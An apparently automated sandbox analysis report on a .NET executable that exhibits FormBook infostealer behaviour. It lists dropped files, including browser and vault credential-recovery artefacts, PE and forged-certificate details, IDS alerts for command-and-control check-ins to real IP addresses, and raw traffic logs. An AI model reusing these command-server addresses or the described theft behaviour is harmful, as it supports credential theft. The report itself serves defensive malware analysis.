                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):879
                                Entropy (8bit):5.7905809868505544
                                Encrypted:false
                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1205
                                Entropy (8bit):4.50367724745418
                                Encrypted:false
                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                Malicious:false
                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):843
                                Entropy (8bit):5.76581227215314
                                Encrypted:false
                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):912
                                Entropy (8bit):4.65963951143349
                                Encrypted:false
                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                Malicious:false
                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):11024
                                Entropy (8bit):5.7535502654223265
                                Encrypted:false
                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsN9Jtwg1MK8HNnswuHEIIMuuqd7CKqvkNLYI2:m8IGIEu8RcU
                                MD5:B74774A76E2EBA7E7D1BC9084F2DDFD8
                                SHA1:A054D55F8F69BD4728266EE889DC6002139A84C6
                                SHA-256:2ED862A6E79666081F78A83BA3E39DF823D329D329ACF35B1F19E87E90B9D088
                                SHA-512:2D5E58B9533CB498A808B3FDB43A10108FB96F2F3B959561FE859926C9152A3866911C9463C52C486A0031B39881BE332529A4861BDD247F1277BF06D809D46F
                                Malicious:false
                                Preview:[{"description":"treehash per file","signed_content":{"payload":"
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):854
                                Entropy (8bit):4.284628987131403
                                Encrypted:false
                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                Malicious:false
                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with very long lines (4369)
                                Category:dropped
                                Size (bytes):101461
                                Entropy (8bit):5.397102915873049
                                Encrypted:false
                                SSDEEP:1536:rheqmDIrJJ9WtwoBQJVrMt0bLmuC/iqiP08Du3SPqFKfih9exJZb+5:2EYBQJVOV/iqWDZPqFt0M5
                                MD5:59076AAB2186365E9892E4F465855149
                                SHA1:7928E5F1B3F9D34B00865D91E36786C978F44EF2
                                SHA-256:AC51EAA606C3DBB06839E86D67003CD072D251305E2C67E3C92FDE080896653A
                                SHA-512:15085F01758B0EC636A69455B57946B1867700FCBD256EC52EC0CEED9F68F569ED0B92942998D4C88E4B1CA25A58A934D2EF88C23F3415A697575CA4B515E63B
                                Malicious:false
                                Preview:'use strict';function k(){return function(){}}function n(a){return function(){return this[a]}}var q;function ba(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ca="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var r=da(this);function t(a,b){if(b)a:{var c=r;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ca(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}function c(f,g
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2397
                                Entropy (8bit):5.423941875432813
                                Encrypted:false
                                SSDEEP:24:1HEZ4qW4VlELb/KxktGu7VwELb/s2QDkUpvdlmF1exy/Otj1vJSVvs:W7WsaLTKQGuxTLT2Rv3mves/OPhSVk
                                MD5:D5C2307E326E9CDD9F3FB44D5389D968
                                SHA1:F7E51ABD69BBF3DEB17C2159946B189C35DB0F72
                                SHA-256:7A80C8C6EF18A27ECC31AF7CDB0E26C4CD756009202B45F79F4D3FB372B72B3E
                                SHA-512:038A0379AD7DF393332BDC985257EADE55B50C30BC5A90C32D6B9D626639AD7FB8DB5D0B1FEFCF99DD5C978646091E1EFF38552DC6C891F192D1037224488529
                                Malicious:false
                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "persistent": false,.. "scripts": [ "eventpage_bin_prod.js" ].. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": "script-src 'self'; object-src 'self'",.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "matches": [ "htt
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):291
                                Entropy (8bit):4.644891151983713
                                Encrypted:false
                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK6M23:2Q8KVqb2u/Rt3OnjI
                                MD5:EE9839F99DED6F38DC561DB846B51E80
                                SHA1:DD2128A473C2FF47471400C81EFF416285DE606E
                                SHA-256:06E08E421EB7F0FE7959D68E27D40A9146A54503090D95CFAC6F2FFD72A78769
                                SHA-512:C8D77607F00CB8012CD056CE61CB77918EC43621270511303E09577F89CC57D4954E22E2C8C3FB1029AAE29F8142DAAE2E938CD5590AD0E5DE6DB1208AFEF874
                                Malicious:false
                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=2;}).call(this);.
                                Process:C:\Windows\SysWOW64\mstsc.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                Category:dropped
                                Size (bytes):89830
                                Entropy (8bit):7.843727464517177
                                Encrypted:false
                                SSDEEP:1536:CJ24dtBHS/W0d0hbbSbaA2+WS3KGTOpkhgOaE9/V5FBijKM8llllaIKR2l8/2:H4dtm0h/EaA2+WS3KZkhgO19/DO9bHO
                                MD5:158D3E34A2C1FB1B7910FB890CAF4C4C
                                SHA1:BBCBFCEF08FCE44B19F2301EDAF1E97E968CE9F5
                                SHA-256:3C06BDF9CDB31BC804D1EDFFE5212F8E0FCA395762F5F982696E86A6845A43A4
                                SHA-512:E85B84BE39D105F2FDC96F27535D13B24894445BDB595E58E12B4E4B6C7E6733789ADF3C6F163FE1D8F600A0B2F151029BED33A584EBC70AAD3A8EDDEFF9EA68
                                Malicious:false
                                Process:C:\Windows\SysWOW64\mstsc.exe
                                File Type:Targa image data - RGB - RLE 109 x 101 x 32 +114 +111 "R"
                                Category:dropped
                                Size (bytes):38
                                Entropy (8bit):2.7883088224543333
                                Encrypted:false
                                SSDEEP:3:rFGQJhIl:RGQPY
                                MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                Malicious:false
                                Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                                Process:C:\Windows\SysWOW64\mstsc.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):2.8420918598895937
                                Encrypted:false
                                SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                Malicious:true
                                Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                                Process:C:\Windows\SysWOW64\mstsc.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):2.96096404744368
                                Encrypted:false
                                SSDEEP:3:AJlbeGQJhIl:tGQPY
                                MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
                                SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
                                SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
                                SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
                                Malicious:true
                                Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.466149925859053
                                Encrypted:false
                                SSDEEP:6144:hIXfpi67eLPU9skLmb0b4IWSPKaJG8nAgejZMMhA2gX4WABl0uNgdwBCswSb0:iXD94IWlLZMM6YFHy+0
                                MD5:D89E393AB20C9E2434A546C66F8B1064
                                SHA1:EECD8AA361151FC87A4C64D5D32F402E7C511F4D
                                SHA-256:73B82C212B23F71A7D02BE807C661C5B2FE97EA0151F2A480FA9D7394950486A
                                SHA-512:312D4EB88D0742098973719AC5C4F9A14BE5B66DFB22341CA46168B135B7901DAF4515E06BDF09B30C57C5A85B09FFAA5706B8863DB929E68C7F0006CA70DC1E
                                Malicious:false
                                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.973209222952696
                                TrID:
                                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                • Win64 Executable GUI (202006/5) 46.43%
                                • Win64 Executable (generic) (12005/4) 2.76%
                                • Generic Win/DOS Executable (2004/3) 0.46%
                                • DOS Executable Generic (2002/1) 0.46%
                                File name:#U0426#U0438#U0442#U0430#U0442#U0430.exe
                                File size:575'728 bytes
                                MD5:84144b6048277290bb6eb647bbc5ad2a
                                SHA1:609a26e95e4b343bfb47ab51bdd68ef9a8ef791f
                                SHA256:151bfa7336a9c96e65bf8a0eeb54a3d34665e612c8c5b3a7886f16a6f58277c4
                                SHA512:792f0c22ed8aef3766f773f4c49698e9d2d2678191c98493e83076fa90dc8a83d67cdd00fe46d7409b4eeb1539c542cd0219b4b9121d45ecbb0ec0ac3bd94baa
                                SSDEEP:12288:R+vLWa44/RYO83ksdpiVRkvZU08wvzTIVodNgvBqk0WFLehfK2iE3LKvmbrJ:E44/Ky7MN7LT4vBqkle1FPbKSd
                                TLSH:BAC4234959DC8332DDAB473666BBD2C10734B7063986AE293CE824513C5E3D05BB27AE
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...&............."...0..x............... ....@...... ..............................Xq....`................................
                                Icon Hash:90cececece8e8eb0
                                Entrypoint:0x400000
                                Entrypoint Section:
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0xD9A1AC26 [Thu Sep 13 20:27:18 2085 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:
                                Signature Valid:false
                                Signature Issuer:C=RU, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                Error Number:-2146762487
                                Not Before, Not After
                                • 22/05/2024 08:34:07 22/05/2025 08:34:07
                                Subject Chain
                                • C=RU, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                Version:3
                                Thumbprint MD5:4671A321FAF6E789481C96779E6BF18C
                                Thumbprint SHA-1:4152F4CD944747A079826DC4BE1319FC1975DD7A
                                Thumbprint SHA-256:90E3D3140C20C1745FD4573CAB1965319C03BBD0562886EC7F6F5E7906715D67
                                Serial:445822D9C199F35AF3BF4C72F8FBC0EF
                                Instruction
                                dec ebp
                                pop edx
                                nop
                                add byte ptr [ebx], al
                                add byte ptr [eax], al
                                add byte ptr [eax+eax], al
                                add byte ptr [eax], al
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x760 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8b010 | 0x18e0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9898 | 0x1c | .text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x2000 | 0x78b4 | 0x7a00 | 81c1bf05aa7274f8f16d32e9f22bd1a5 | False | 0.4681416495901639 | data | 5.757043602973376 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc | 0xa000 | 0x760 | 0x800 | faef9ea4895b550d5dc16709f3d795e8 | False | 0.2529296875 | data | 3.7394591731117988 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                RT_VERSION | 0xa070 | 0x378 | data | | | 0.49324324324324326
                                RT_VERSION | 0xa3e8 | 0x378 | data | English | United States | 0.4954954954954955
                                Language of compilation system | Country where language is spoken | Map
                                English | United States |
                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                05/27/24-08:44:12.485707 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49849 | 80 | 192.168.2.4 | 3.33.130.190
                                05/27/24-08:45:34.816913 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49855 | 80 | 192.168.2.4 | 15.197.142.173
                                05/27/24-08:45:14.403891 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49853 | 80 | 192.168.2.4 | 18.143.129.199
                                05/27/24-08:43:11.099341 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49846 | 80 | 192.168.2.4 | 66.29.149.193
                                05/27/24-08:44:54.353420 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49851 | 80 | 192.168.2.4 | 38.174.75.236
                                05/27/24-08:46:38.965412 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49860 | 80 | 192.168.2.4 | 217.160.0.14
                                05/27/24-08:45:55.375437 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49857 | 80 | 192.168.2.4 | 91.195.240.19
                                TimestampSource PortDest PortSource IPDest IP
                                May 27, 2024 08:42:40.401079893 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.401209116 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.401257992 CEST44349759172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.438035965 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.438273907 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.438308954 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.439075947 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.439177990 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.440073967 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.440160036 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.440175056 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.442106009 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.442222118 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.442392111 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.442405939 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.507797003 CEST44349758162.159.61.3192.168.2.4
                                May 27, 2024 08:42:40.507955074 CEST49758443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:40.509629011 CEST49758443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:40.509670019 CEST44349758162.159.61.3192.168.2.4
                                May 27, 2024 08:42:40.525808096 CEST44349759172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.525965929 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.526479006 CEST49759443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.526492119 CEST44349759172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.628458977 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.702945948 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.702997923 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.703052998 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.703082085 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.705602884 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.705682039 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.705699921 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.711638927 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.711705923 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.711719990 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.717644930 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.717699051 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.717713118 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.723704100 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.723773956 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.723793983 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.729746103 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.729820013 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.729837894 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.730285883 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.730618000 CEST49760443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.730678082 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.734285116 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.734388113 CEST49760443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.735843897 CEST49760443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.735886097 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.735935926 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.736011028 CEST49760443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:40.736011982 CEST49755443192.168.2.4142.250.184.225
                                May 27, 2024 08:42:40.736028910 CEST44349755142.250.184.225192.168.2.4
                                May 27, 2024 08:42:40.736035109 CEST44349760172.64.41.3192.168.2.4
                                May 27, 2024 08:42:40.741940975 CEST44349755142.250.184.225192.168.2.4
